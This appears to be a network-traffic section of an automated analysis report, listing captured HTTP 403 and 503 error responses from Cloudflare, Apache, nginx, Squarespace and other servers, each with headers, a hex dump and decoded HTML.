                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l%2B5XaIdsqXpjePZDwjvgSs82LXLOG9A5ur7ZuJFelphR8Jb9OValciEEuQqP9F4L84cuu81lk2JpdKeV3AT8A6fZw4YcJNeEE2ErtuBOZ7aKk2KjYQ%2FbkXjPEvPtECYH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e0f5f123834-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:49 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BePjGOo/wl0SN2Q3YThhYWEyYjhiMGVlYTg3Y2RlYWI2NWNmMGNk;Path=/X-Contextid: e5IYmMC1/4OolruKIData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:49 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:50 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HYZN9T5rxyKhryNnXKW6mGnv%2BGFShLZLpxdCT3abKfYFmBrUEzjmhzlO4D7pq%2FZxb62UWdwlswdryYLiGzlLMxmjBIriIQvitVPi9KsMZwSiXYvJUHtMVKV1IK4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e139b0f35df-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:53 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:07:54 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:54 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:55 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BWiKbFhLhn2oMzJlNDAzZjJkMjY4ZTg0ODM0Mzk5NWRkNDdiM2Vl;Path=/X-Contextid: b34TGwhY/U5Iv1iPtData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 05 Jul 2023 06:07:56 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:56 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 